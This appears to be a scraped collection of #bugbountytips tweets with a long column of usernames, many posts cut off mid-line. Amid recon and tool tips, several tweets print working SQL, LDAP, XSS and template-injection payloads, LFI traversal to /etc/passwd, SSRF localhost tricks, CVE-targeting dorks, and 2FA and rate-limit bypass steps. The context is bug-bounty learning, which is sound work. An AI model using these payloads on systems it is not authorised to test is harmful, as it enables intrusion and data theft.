from_user
TheMuztahidul
TheMuztahidul
ret2basic
xumut00_
700_isnuoT
sentinelleFr
VinayKu80824352
x_Hoque
sentinelleFr
noobie_maniac
700_isnuoT
sentinelleFr
sentinelleFr
sectest9
sentinelleFr
vanshitmalhotra
sentinelleFr
riomulyadi_
t1nd19d
Darkness_E1
realkartiks
sentinelleFr
sentinelleFr
jodelak
sentinelleFr
sectest9
sentinelleFr
sentinelleFr
UneekVivek
nafisaqil832
sectest9
618Slava
bsidesahmedabad
UneekVivek
micha3lb3n
UneekVivek
UneekVivek
Aj_louni
Savan_77
Maulik1827
IncScripts
SSXman2
WebSecurityIT
assasinflyer
nafisaqil832
javisenberg
cybersec_feeds
Zero0x00
arp_29
Haroldperkin250
seckteck
tech_naivi
tech_naivi
Bhagavan_bolli
ChavdaZeel
sectest9
pr0gr35528
pr0gr35528
pr0gr35528
jattboe
cry__pto
cry__pto
x_Hoque
aubrey_lab
AaronCuddeback
x_Hoque
x_Hoque
aubrey_lab
hacback17
x_Hoque
x_Hoque
x_Hoque
laud3b
x_Hoque
x_Hoque
x_Hoque
sec_onee
x_Hoque
msabhishek97
sec_onee
frankmosigisi
cybersec_feeds
good_sector
good_sector
good_sector
CYBerSec_Freak
mohitkchandani
cybersec_feeds
cybersec_feeds
cybersec_feeds
dan_covic
sectest9
Nutritionist_AP
nodeQuotesBot
Kill__3r
cybersec_feeds
bountyhunter_fr
bountyhunter_fr
bountyhunter_fr
bountyhunter_fr
Nutritionist_AP
bountyhunter_fr
bountyhunter_fr
bountyhunter_fr
bountyhunter_fr
TechSG2
TechSG2
dynamicCISO
OttLegalRebels
th3hokag3
SSXman2
SatyamGothi
bountyhunter_fr
cybersec_feeds
cybersec_feeds
bountyhunter_fr
cybersec_feeds
techtrendingnow
rudr4_sarkar
bountyhunter_fr
bountyhunter_fr
HarryHSolo
cybersec_feeds
__ceraunophile_
__ceraunophile_
GeekScripts
bountyhunter_fr
bountyhunter_fr
plzmakelstb4shp
saadibabar
saadibabar
saadibabar
l_y_n_s
bountyhunter_fr
bountyhunter_fr
ReaLentLess79
bountyhunter_fr
wareeq_shile
mhsecure
wareeq_shile
saintmalik_
TheBugBot
cybersec_feeds
JMakopolo
fayis_vadakkan
itsdig
priyanshu_xo
iamkamaljeet418
bountyhunter_fr
bountyhunter_fr
bountyhunter_fr
roughwire
hackd00r
CharuDutt8
s3rgiomazari3go
tanmayn36
vanshitmalhotra
vanshitmalhotra
vanshitmalhotra
TheBugBot
PoundXI
bountyhunter_fr
streaak
bountyhunter_fr
KomodoGT
Jaffy___
WebSecurityIT
ssh0x00r
bountyhunter_fr
tanmayn36
bountyhunter_fr
F3RR4R1_R3D
abagdadi
Anticlue
Nutritionist_AP
D0rkerDevil
bountyhunter_fr
Faeeqjalali
jayeshmthakur
AldenAous
AldenAous
k1ss_n00b
hacback17
0sninja
harshbothra_
dynamicCISO
theloshackers
enoleriiand
bountyhunter_fr
AldenAous
cybersec_feeds
bountyhunter_fr
cyanpiny
laud3b
bountyhunter_fr
ja1sharma
CristiVlad25
JAX_MASTERS
AldenAous
sectest9
fluttbot
pwn0sec
Ranger_one_
TechSG2
TechSG2
theInfernobot
TechSG2
TechSG2
hsakarp_ilajna
hsakarp_ilajna
AldenAous
AldenAous
KalemaChris
firearmslawyer
0x61_
cybersec_feeds
theInfernobot
xxx_BUGGY_xxx
jsfairy
jsfairy
bountyhunter_fr
sectest9
JMakopolo
hsakarp_ilajna
bountyhunter_fr
KKTech7
chickflow0
WebSecurityIT
GainSec
iambeingjoker
vatsav990
bountyhunter_fr
iambeingjoker
iambeingjoker
bountyhunter_fr
bountyhunter_fr
bountyhunter_fr
bountyhunter_fr
bountyhunter_fr
bountyhunter_fr
WebSecurityIT
HarryHSolo
nodeQuotesBot
bountyhunter_fr
BeingjokerMeme
iambeingjoker
bountyhunter_fr
bountyhunter_fr
bountyhunter_fr
bountyhunter_fr
bountyhunter_fr
bountyhunter_fr
bountyhunter_fr
Nutritionist_AP
TechSG2
Nutritionist_AP
Nutritionist_AP
TechSG2
aye_robot
TechSG2
TechSG2
aye_robot
sectest9
TechSG2
bountyhunter_fr
bountyhunter_fr
bountyhunter_fr
bountyhunter_fr
TechSG2
aye_robot
aye_robot
nlognbot
aye_robot
aye_robot
saurabh_sam96
iambeingjoker
nodeQuotesBot
bountyhunter_fr
bountyhunter_fr
vNature0
haknfuk
bountyhunter_fr
sectest9
MrrFawadkhann
sectest9
bountyhunter_fr
safe_buffer
bbuerhaus
bountyhunter_fr
F3RR4R1_R3D
sectest9
CristiVlad25
JohnSno99347035
KKTech7
AldenAous
AldenAous
AldenAous
Nutritionist_AP
Alra3ees
bountyhunter_fr
bountyhunter_fr
Ayhemalfakhri
iambeingjoker
roughwire
bountyhunter_fr
iambeingjoker
bountyhunter_fr
gkhck_
SatyamGothi
bountyhunter_fr
gdattacker
dhakal_ananda
0xfsec
HertzCar
bountyhunter_fr
bountyhunter_fr
iambeingjoker
BeingjokerMeme
dan_covic
V3NOM_10
good_sector
sec_onee
bountyhunter_fr
ajdumanhug
salahelhossiny0
ajdintrejic
KomodoGT
AldenAous
Virdoex_hunter
vishnugadupudi
cry__pto
bountyhunter_fr
0xrudrapratap
k1ss_n00b
Nutritionist_AP
niravsikotaria
CYBerSec_Freak
bountyhunter_fr
TechSG2
bountyhunter_fr
laud3b
bountyhunter_fr
bountyhunter_fr
bountyhunter_fr
laud3b
bountyhunter_fr
bountyhunter_fr
bountyhunter_fr
laud3b
bountyhunter_fr
bountyhunter_fr
bountyhunter_fr
laud3b
bountyhunter_fr
bountyhunter_fr
bountyhunter_fr
bountyhunter_fr
bountyhunter_fr
bountyhunter_fr
bountyhunter_fr
bountyhunter_fr
bountyhunter_fr
bountyhunter_fr
bountyhunter_fr
bountyhunter_fr
bountyhunter_fr
bountyhunter_fr
bountyhunter_fr
bountyhunter_fr
laud3b
bountyhunter_fr
bountyhunter_fr
bountyhunter_fr
bountyhunter_fr
bountyhunter_fr
Nutritionist_AP
bountyhunter_fr
Nutritionist_AP
skypatil98
pdnuclei
Monish91888822
bountyhunter_fr
mythicalcmd
streetofhacker
maverickNerd
bountyhunter_fr
_sickwiz
R4JVE3R
InonShkedy
MrrFawadkhann
amrul_01
AkaaZaan
bountyhunter_fr
ssh0x00r
ShieldVoC
BeingBharatiyaa
qw0lz
Nutritionist_AP
TechSG2
TechSG2
TechSG2
Debian_Hunter
PoundXI
bountyhunter_fr
could_10
vishne0
nodeQuotesBot
gmccane
s3rgiomazari3go
bountyhunter_fr
cyberdefender5
joeldeleep
bountyhunter_fr
Sudhans42246878
0xMiracle
makash
pdiscoveryio
bountyhunter_fr
INR_0x0Ma5K
ryan_kl_ko
sameh_9_
bountyhunter_fr
sh0mbo
Xiloe_Dev
saqibarif1998
knassar702
0x0Cj
sw33tLie
debangshu_kundu
rnd_infosec_guy
TebbaaX
bountyhunter_fr
hajiraess
BotInfosec
BotInfosec
BotInfosec
BotInfosec
BotInfosec
BotInfosec
BotInfosec
BotInfosec
BotInfosec
_0nk4r_
AniruddhaKl
AndyInfoSec_
Jhaddix
Rajat_sharma111
_seecko
ExploitedSystem
tanmayn36
HackerOn2Wheels
neutrinoguy
joselbr5
sriramoffcl
hacktory1
roughwire
pxmme1337
Xer0Days
bountyhunter_fr
Digitalsanjog
bountyhunter_fr
bountyhunter_fr
bountyhunter_fr
bountyhunter_fr
bountyhunter_fr
bountyhunter_fr
SaitejaB171
SaitejaB171
chiraggupta8769
AldenAous
frankmosigisi
ssh0x00r
SecSummers
imnirfn
xploitprotocol
xploitprotocol
xploitprotocol
ssh0x00r
Tyr4ntSec
sillydadddy
OAcybersecurity
sectest9
fiddlycookie
AldenAous
muhamme16102088
muhamme16102088
muhamme16102088
mirac_dasmine
muhamme16102088
stokfredrik
Jhaddix
0xMiracle
AndyInfoSec_
sectest9
AniruddhaKl
caseyjohnellis
GainSec
TechSG2
TechSG2
nodeQuotesBot
TechSG2
TechSG2
TechSG2
TechSG2
TechSG2
EvMd15
r3dw0lf_sec
Michael1026H1
Akash0x01
sectest9
syauqqii
thedarkwayg
ArthusuxD
sectest9
striveben
sectest9
t1nd19d
bountyhunter_fr
bountyhunter_fr
bountyhunter_fr
mirhatx
pdiscoveryio
sectest9
Nutritionist_AP
Nutritionist_AP
TrainingBug
TrainingBug
daoud_youssef
bountyhunter_fr
RustySowers
Securityblog
plenumlab
bountyhunter_fr
CyberRitesh
bountyhunter_fr
text
RT @renniepak: Pretty happy with this one-liner to extract endpoints from JavaScript file
cat main.js | grep -oh "\"\/[a-zA-Z0-9_/?=&]*\"" | sed -e 's/^"//' -e 's/"$//' | s
#bugbountytips https://t.co/Z6Rv4hLnUC
RT @chiraggupta8769: shodan search org:"Target" http.favicon.hash:116323821 --fields
#bugbountytips
#bugbountytip By @K4r1it0 https://t.co/HLVXbYWfey
RT @pwntheweb: This is how I found sql-Injection 100% of the time
For https://t.co/GIZTA591Y0
/?q=1
/?q=1'
/?q=1"
/?q=[1]
/?q[]=1
/?q=1`
/?q=1\
/?q=1/*'*/
/?q=1/*!1111'*/
/?q=1'||'asd'||' <== concat string
/?q=1' or '1'='1
/?q=1 or 1=1
/?q='or''='
#bugbounty #BugBountyTips
RT @0xElkot: Recon Tip for :
-Subdomain enumeration
-Finding endpoints
-Finding parameters
#bugbountytips #BugBounty #reconnaissance https://t.co/IKr8ehNg24
RT @Naategh_: The number of zeros in http://127.0.0.1 doesn't matter, So we can use t
http://127.1
http://127.000000000000000.001
http://127.000.000.00000000000000001
...
#bugbounty #bugbountytips
RT @CharuDutt8: I just published How I was Able To bypass Cloudflare WAF https://t.co
#bugbountytips @_abhichimbalkar @deep803937 @chevonphillip @dybtron
RT @AldenAous: Top 25 Remote Code Execution (RCE) Parameters
#bugbountytips #bugbountytip #bugbounty https://t.co/2JI8LraxWV https://t.co/uL0
RT @musiclouderlml: my first #bugbountytips ,
the company's mail system can be vulnerable to homographs IDN ,
try to ask reset password for victim@example-com to victim@exàmple-com , if the backe
RT @trbughunters: ️Top 25 XSS Dorks according to OpenBugBounty
️ ️♂️
#bugbountytips #bugbountytip #bugbounty #cybersecurity #infosec #ethicalhacking ht
RT @chiraggupta8769: ️Ways to bypass rate limit ️By @fuxksniper
️️
#ethicalhacking #bugbounty #bugbountytips #bugbountytip https://t.co/robIZvKiiZ
RT @AldenAous: ⛓
️Get Reflected XSS within 3 minutes ⛓
️by:@gkhck_
https://t.co/ZSGoyAvqdo
#cybersecurity #infosec #ethicalhacking #bugbounty #bugbountytips #bugbountytip
RT @cry__pto: Metasploit Community CTF 2020 Writeup.pdf:
https://t.co/EJ6Ox1fGYc
#Pentesting #Hacking #redteam #bugbountytips
RT @Bugcrowd: Want to make bug hunting your career, but hitting some blocks and uns
Take some tips and tricks from @ninad_mathpati in todays researcher spotlight! #ItTake
RT @TobiunddasMoe: My quick and basic recon routine for finding Subdomains while doi
#hackers #netsec #bugbountytip #bugbountytips #bugbounty #infosec #redteam #pen
RT @vanshitmalhotra: #BugBounty #BugBountyTip #bugbountytips #penetrationtesting
#hackers #informationdisclosure #owasp https://t.co/8w7MH3XHrJ
#BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops
#informationdisclosure #owasp https://t.co/8w7MH3XHrJ
RT @gkhck_: To be more successful in bug bounty ...[I think] A short but very effective s
*Take a break, Learn more and Try again
https://t.co/pgFf3xWxZH
#bugbountytips #bugbountytip #infosec
RT @chiraggupta8769: ️Accessing the Admin Panel tip ️By @SalahHasoneh1
️️
#bugbounty #bugbountytips #bugbountytip https://t.co/bgv4Dw7dOu
RT @pdnuclei: Done with subdomain enumeration? here is how you can get more assets
#hackwithautomation #assetdiscovery #recon #subdomains #bugbountytips https://t.
RT @mariusshoratau: Have you heard about AlienVault OTX? You can use it to get easy b
#bugbountytips #bugbountytip #bugbounty #cybersecurity #infosec #ethicalhacking ht
RT @jodelak: Github dorks for finding secret data..
#bugbountytips #Security #Network #infographics
#hacker #malware #cybercriminal #botnet #server #control #spam #hacking #Infosec
RT @r0bre: Proud to release ScriptFinder, a tool for automated JS file discovery!
https://t.co/cTpu4tBoh4
Thx to @TomNomNom @stokfredrik @hakluke @NahamSec @nnwakelam @zseano @EdO
#recon #hacking #infosec #bugbounty #bugbountytip #bugbountytips https://t.co/0A9
RT @avasdream_: So here is my repository of dockerized pentesting tools. This comes in
https://t.co/2ywul31IVH
#Pentesting #Docker #Dockerfile #Containers #BugBounty #BugBountyTip #bugbounty
Github dorks for finding secret data..
#bugbountytips #Security #Network #infographics
#hacker #malware #cybercriminal #botnet #server #control #spam #hacking #Infosec
RT @emgeekboy: For all the hackers starting with bug bounty, here is how you can get r
#bugbountytips #recon #security
RT @_Rutik_Sangle_: #100daystolearnandimprove
Day 95:
1. Continued Solving some more Authentication labs on @WebSecAcademy
2. Read some Authentication Bypass blogs:
https://t.co/PQOGxWzXJW
https://t.co/wcYOh8fO5N
https://t.co/ipor9FYcR5
https://t.co/iEAAzGnsJp
#infosec #bugbounty #bugbountytips
RT @Virdoex_hunter: web pentesting roadmap
https://t.co/gMuHryDZnt @ADITYASHENDE17 @stokfredrik @NahamSec @nehatarick @m
RT @TheHackersNews: << Interesting Case Study >>
How Bug Bounty Platforms—HackerOne, Bugcrowd, Synack, Intigriti, and Zerocopter—R
https://t.co/pWXnVycfNp
#infosec #pentest #bugbountytips #privacy #bugbountytip #cybersecurity #informatio
RT @gkhck_: #bugbountytips #infosec #bugbountytip
1 - Go Burp Suite / Target
2 - Select all items
3 - "Save selected items" (targets)
4 - https://t.co/2p02LqodqY -i targets -b -r ^/ -o cli https://t.co/gkzXmwJV4i
RT @knassar702: #PmG - Extract parameters/paths from urls
https://t.co/0Oah7JwH76
#bugbountytips #recon https://t.co/09hZn9fwvq
RT @618Slava: I often see that OSI knowledge is really needed!!
How much this knowledge is really needed? I can't find anything about their application
#BugBounty
#bugbountytips https://t.co/xKJAuhjM8h
I often see that OSI knowledge is really needed!!
How much this knowledge is really needed? I can't find anything about their application
#BugBounty
#bugbountytips https://t.co/xKJAuhjM8h
RT @Aj_louni: Just a quick reminder the AMA by @bsidesahmedabad with the humble lov
#bugbounty
#bugbountytips
#stream https://t.co/p30ZP4gOnW
RT @laud3b: Find SSRF issues via inject headers (like x-forwarded-host,..etc) with this
.
https://t.co/C2E8XUKGRz
#bugbountytips #bugbounty https://t.co/OEkYLIt3YE
Broken link hijacking!
#bugbounty #bugbountytips https://t.co/Py2g24HxbZ
RT @SalahHasoneh1: ️Dorks for CVE-2020-3452 ️
️️
#cybersecurity #infosec #ethicalhacking #bugbounty #bugbountytips #bugbountytip #
RT @m4ll0k2: When you find a public form (contact form,etc.) try these payloads (blind
Just a quick reminder the AMA by @bsidesahmedabad with the humble lovely @thedawg
#bugbounty
#bugbountytips
#stream https://t.co/p30ZP4gOnW
RT @cry__pto: DOM XSS in Gmail with a little help from Chrome.pdf:
https://t.co/ADkttdw0r7
#bugbountytips #Pentesting #Hacking #redteam
RT @Zero0x00: Join us tonight at 9 pm for an intriguing live session with @thedawgyg
https://t.co/4aT4ldTgn6
Learn about tips & tricks about #bugbounty from his experience!
"Walla" "walla"
Bada maza ane wala hai !!!!
Do join us :)
#bugbountytips #hacking https://t.co/bMrUvr0kFk
RT @fayis_vadakkan: How to Bypass The Rate limiting✌️✌️
Add this header in to the post request with an IP address.
X-Forwarded-For: (Any IP Address )
#bugbountytips #bugbounty #vulnerability #Hackers #exploit
️RT @AldenAous: ️Top 25 Local File Inclusion (LFI) Parameters 🛡️
#bugbountytips #bugbountytip #bugbounty #cybersecurity #infosec #ethicalhacking #
RT @SalahHasoneh1: ️Using the password reset code more than once ️
️️
#cybersecurity #infosec #ethicalhacking #bugbounty #bugbountytips #bugbountytip ht
RT @laud3b: CloudFlare Origin Certificate
How to find out the real server IP hidden behind the Cloudflare CDN
443.https.tls.certificate.parsed.subject.common_name: CloudFlare Origin Certificate
#bugbountytips #bugbounty
RT @manas_hunter: Github dorks for finding secret data..
Happy hacking:)
#bugbountytips #infosec https://t.co/GOk9SvUQMt
RT @s3rgiomazari3go: Sublist3r is a tool designed to enumerate subdomains of website
https://t.co/20u5jZOPaR
#cybersecurity #hackingtools #bugbountytips https://t.co/3TLqEVmFaV
RT @SalahHasoneh1: ️Ways to bypass rate limit ️
️️
#cybersecurity #infosec #ethicalhacking #bugbounty #bugbountytips #bugbountytip #
Join us tonight at 9 pm for an intriguing live session with @thedawgyg on @bsidesahm
https://t.co/4aT4ldTgn6
Learn about tips & tricks about #bugbounty from his experience!
"Walla" "walla"
Bada maza ane wala hai !!!!
Do join us :)
#bugbountytips #hacking https://t.co/bMrUvr0kFk
RT @harshbothra_: It was great to have a talk with @dynamicCISO. In case if you misse
Slides: https://t.co/d77RbZXwqG
Stream: https://t.co/vrILyaZoLj
Thanks, @hacback17 for carrying this out.
#bugbountytips #bugbounty #websecurity #hacking #recon #bugcrowd
RT @laud3b: You can change WPEngine's config file on the WordPress blogs. Path "/_wp
#bugbountytips #bugbounty https://t.co/mwRqcvFj5p
RT @Jhaddix: Monday Night #BugBounty #bugbountytips
- Found 2 sites with source code disclosure via git.
- Struggled with git for a long while to extract files from objects.
- Audited some PHP
- Frustrated with git, going to bed =P
RT @bbuerhaus: Once I realized the trick to @adamtlangley's "I once was blind but now
TIL @PortSwigger's Burp Collab does SMTP!
This is insaaanely useful.
#bugbounty #bugbountytips https://t.co/1Xdo79FEUG
RT @AldenAous: Recon Tip for :
-Subdomain enumeration
-Finding endpoints
-Finding parameters By @0xElkot
#bugbountytips #BugBounty #bugbountytip https://t.co/Rf4Vfwmfp2 https://t.co/Lu
RT @SalahHasoneh1: ️Accessing the Admin Panel tip ️
️️
#cybersecurity #infosec #ethicalhacking #bugbounty #bugbountytips #bugbountytip #
RT @terjanq: I created a repository to keep track of cool XSS payloads https://t.co/EcV
Check this out!
#xss @XssPayloads #bugbountytips https://t.co/jH9tUS3GgW
RT @dhakal_ananda: Wanna know the best way to be demotivated in the bug bounty fie
Compare yourself with others!
#bugbounty #bugbountytips
RT @chiraggupta8769: Github Dorks For Finding Information Using Extension By @D0rke
#bugbounty #bugbountytip #bugbountytips https://t.co/WmTKTXqAR5
RT @chiraggupta8769: <?php var_dump(explode(',',ini_get('disable_functions'))); ?&
Handy as hell tip for checking which functions you need to by pass on PHP RCE.
Tip By @Random_Robbie
#bugbountytips #bugbountytip #bugbounty
RT @chiraggupta8769: Recon Tip for :
-Subdomain enumeration
-Finding endpoints
-Finding parameters By @0xElkot
#bugbountytips #BugBounty #bugbountytip https://t.co/CAemcyCGQn
RT @intigriti: Did you know you can get the source code of Electron apps by using this h
Metasploit Community CTF 2020 Writeup.pdf:
https://t.co/EJ6Ox1fGYc
#Pentesting #Hacking #redteam #bugbountytips
DOM XSS in Gmail with a little help from Chrome.pdf:
https://t.co/ADkttdw0r7
#bugbountytips #Pentesting #Hacking #redteam
RT @XSaadAhmedX: BugBountyTip: If you playing with `API ENDPOINT` always try to s
#bugbountytip #bugbountytips #bugbounty https://t.co/fcaDHtJxiH
RT @rapiddns: shodan dork
title:"SSL VPN Service"
"webvpnlogin=1"
Happy Hacking!
#bugbountytip #bugbountytips #bugbounty #cisco #vulnerability https://t.co/3As6Gw
RT @hacback17: Hey, wanna learn #Python? "Automate The Boring Stuff" course is #Fre
https://t.co/QVFHjzbBPj
Coupon Code: COPSHOTMEINPORTLAND
#hack #girlswhocode #linux #security #bugbounty #bugbountytips #linux #programm
RT @xalerafera: #bugbountytips #hackerone #bugbounty #recon
Find api links in subdomains, or how to find a simple SSRF in five minutes in a big compa
assetfinder --subs-only https://t.co/oBxOXg0ke5 | waybackurls | grep "?url="
Happy hacking https://t.co/6jFrG3l0Oy
RT @11xuxx: Horizontal priv escalation & full account takeover
1. registered a new user for my company at "/api/register/48e33445-f797-4e62-801f-e
2. changed the UUID to a numerical value -> "2"
3. user created under another company
4. full account takeover
#bugbountytips https://t.co/SsZd1UgEGP
RT @amanmahendra_: Shodan dork for CVE-2020-3452
“Set-Cookie: webvpn;”
#bugbounty #bugbountytips #bugbountytip #hackerone #bugcrowd #togetherwehithar
Hey, wanna learn #Python? "Automate The Boring Stuff" course is #Free for today with
https://t.co/QVFHjzbBPj
Coupon Code: COPSHOTMEINPORTLAND
#hack #girlswhocode #linux #security #bugbounty #bugbountytips #linux #programm
RT @MrCyberwarrior: Privilege Escalation
#bugbounty #BugBountyTips https://t.co/oqfqA8GVDX
RT @11xuxx: Wildcard bypass & LFI
1. Intercepted a POST req that pointed to a local file "/usr/local/redacted/filename"
2. tried "/etc/passwd" -> bad request
3. "/user/local/../../etc/passwd" -> bad request
4. "/user/local/redacted/../../../etc/passwd" -> OK
5. LFI & bounty
#BugBountyTips https://t.co/yNcqbr736R
RT @iambharat18: #BugBountyTips #bugbounty #SharingIsCaring Bug: 2FA Bypass->
-- Sometimes "0000" can give the correct OTP response for every account and redirect y
You can change WPEngine's config file on the WordPress blogs. Path "/_wpeprivate/con
#bugbountytips #bugbounty https://t.co/mwRqcvFj5p
RT @poison_h1: This tip may be posted by someone before. However, I encountered this
#BugBountyTip #BugBountyTips #infosec https://t.co/utvdR0OqMU
RT @avanish46: After 2 days of struggling, Bypassed a strong XSS filter on one of the pr
[ No '>' was allowed , no Html tags, Character length 35 ]
XSS Payload used :-
<svg onload="alert(1)" <="" svg=""
@XssPayloads
#BugBountyTips #BugBounty https://t.co/T2bZQi9u10
RT @_heinthant: Got a survey from?
Don't only test for blind xss
Try this once
#bugbountytips https://t.co/w2jr5FMLec
RT @Virdoex_hunter: SSRF one liner Command(both mannual & automatic) and tip
More SSRF tips:
https://t.co/8GSH3POwb3 #bugbountytip #bugbountytips
@ADITYASHENDE17 @1ndianl33t @stokfredrik @dhakal_ananda @remonsec @trippy_bh
RT @alicanact60: Don't forget to check the responses. Maybe you can find some tokens l
I found a token in response and went to mailbox. The email verification link was xx+.com
And I saw they are same tokens!
#BugBountyTips #BugBountyTip https://t.co/Yncxc406hp
RT @SatyamGothi: NEW VIDEO ALERT🚨
Your Sunday dose of Information📖
The next one on the series, Identifying Technologies for your Targets!
https://t.co/qKr1pPXn2t
Trying to make sort of a Beginner friendly #BugBountyCourse! Do check it out❤️
Hope it helps :)
#bugbountytips #bugbounty
RT @stokfredrik: HOURS & HOURS OF FREE CYBER SECURITY TRAINING??? (im loo
August is going to be.. crazy!
feat: @Hacker0x01 @defcon @redteamvillage @AppSec_Village @Bugcrowd @secarmyof
#bugbounty #bugbountytips #appsec #infosec https://t.co/PAbmt6Zms6
i was testing for ssti on this page using this payload {{9-3}} and this the output am get
#bugbountytips
#bugbounty https://t.co/NCC8CJWYTF
RT @PoundXI: Two good articles about HTTP Request Smuggling.
1.https://t.co/trsGgcBCOg
2.https://t.co/BwoMkuigWi
#cybersecurity #bugbounty #bugbountytips
RT @Queseguridad: When auditing a SAP it is important to have a good dictionary, as it
RT @HusseiN98D: SSRF script requested by @Alra3ees
This script will take a domain and a callback server, append SSRF parameters and fire th
#BugBountytip #BugBountytips #BugBounty https://t.co/TOLtwDq8u1
RT @m4ll0k2: I found a lot SSRF issues via inject headers (like x-forwarded-host,..etc) w
https://t.co/YRJj4XR3av
By @hakluke
Will be helpful for new bug bounty hunters. Watch it out.
#bugbounty #bugbountytips #cybersecurity
RT @maverickNerd: I just published Android App Security & Testing https://t.co/cQ
It was long pending, found a draft in my notes, corrected it and thought why not share i
#androidsecurity #bugbountytips #bugbounty
RT @vanshitmalhotra: #BugBounty #BugBountyTip #bugbountytips #penetrationtesting
#hackers #informationdisclosure #owasp https://t.co/ALXAVUiIf7
RT @vanshitmalhotra: #BugBounty #BugBountyTip #bugbountytips #penetrationtesting
#hackers #informationdisclosure #owasp https://t.co/ZVrslIQtoM
RT @vanshitmalhotra: #BugBounty #BugBountyTip #bugbountytips #penetrationtesting
#hackers #informationdisclosure #owasp https://t.co/othzLzOqx1
RT @lutfumertceylan: 🚀 How can you make a Javascript Polyglot for XSS? 🚀
#BugBounty #bugbountytips #bugbountytip #CyberSecurity #infosec #hacked https://
RT @harshbothra_: XSS is pure love and combined with luck, it may give unexpected res
#bugbountytips #bugbounty #hacking #bugbountywriteups #security
RT @HackerHumble: OTP Verification bypass #5
1. Web app is sending a verification code to email before changing some sensitive fields
2. Intercepted the request in burp and found the email parameter (eg: email: victim@gm
#bugbountytips #bugbounty #hacking
RT @Kill__3r: Noob question?
need help.
when I try to evaluate javascript: and eval: functions it is saying access to this page is d
#bugbountytips #bugbounty https://t.co/24zT3EBtmr
Noob question?
need help.
when I try to evaluate javascript: and eval: functions it is saying access to this page is d
#bugbountytips #bugbounty https://t.co/24zT3EBtmr
RT @CristiVlad25: What I consider the top two learning and testing books for #pentestin
#cybersecurity #bugbountytips #penetrationtesting
https://t.co/d9bPjpqcxH
RT @ShMalav: #bugbountytips
#bugbountytip
Subdomain Enumeration tip
Install https://t.co/v8eYrU0PhC
run this tool and get resolvers.txt as a result .
Now
Run subfinder from project discovery and use that file
subfinder -d domain_com -o result.txt -nW -v -rL resolvers.txt
😉 😉😉😉
RT @thedarkwayg: Yesterday I sent 5 submissions to @Bugcrowd .
Results: 2 Triaged, 3 Dups 😂😅.
WAF Bypass payload:
">'><details/open/ontoggle=confirm('XSS')>
#BugBountyTips #BugBounty https://t.co/qrSB4gyBKc
RT @_Y000_: #Dork para encontrar paginas vulnerables a #xss
Este ataca una #vulnerabilidad de un tema de #wordpress, el cual se llama: Fruitful
intext:"Fruitful theme by fruitfulcode Powered by: WordPress" intext:"Comment" intext
#CyberSecurity #hacked #bugbountytips https://t.co/xrbVbGGrX4
RT @_Y000_: Este es para encontrar dispositivos iCloud vulnerables, podemos ver todas
intitle:"Index Of" intext:"iCloud Photos" OR intext:"My Photo Stream" OR intext:"Camer
*Nota: pueden modificar los parámetros otros resultados
#Cybersecurite #dork #bugbountytips https://t.co/7NPS5mjfWw
RT @shreyasrx: LDAP Injection 💥
1/3
Payloads :
*
*)(&
*))%00
)(cn=))\x00
*()|%26'
*()|&'
*(|(mail=*))
*(|(objectclass=*))
*)(uid=*))(|(uid=*
*/*
*|
/
//
//*
@*
|
admin*
admin*)((|userpassword=*)
admin*)((|userPassword=*)
x' or name()='username' or 'x'='y
#bugbountytips
#shieldindia
RT @rohit_sonii: Escalating Self XSS to Account Takeover by chaining multiple low level
https://t.co/KtSw3vi80q
#bugbountytips #bugbountytip #bugbounty #infosec #togetherwehitharder
RT @manas_hunter: #bugbountytips
#bugbounty
#infosec https://t.co/II4aQLxH0T
RT @GochaOqradze: #bugbountytip #bugbountytips
Today I bypass F5-Big waf with xss payload.
Interesting is %5K converted to "P" character.
In response source I got
"><P/onweel=alert(1)>mouse wheel here<!--
Payload:
%22%3e%3c%5K/onwheel=alert(1)%3emouse%20wheel%20here%3c%21--
RT @y0dhha: XSS Cheat Sheet
#xss #bugbounty #exploit #BugBountyTips #BugBountyTip https://t.co/zhc1VdddOO
RT @zedsec009: Cloudflare bypass & template injection to XSS in one shoot !
{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}}
#bugbountytips
RT @0xVeera: Private Profile Disclosure - going beyond /wp-json/
The site was using Wordpress
I found various bypass techniques to access private user information.
#bugbountytips @Bugcrowd @SynackRedTeam
Thanks to @ADITYASHENDE17 @u1tran00b @upen1994 https://t.co/Wl5uQJiQ6P
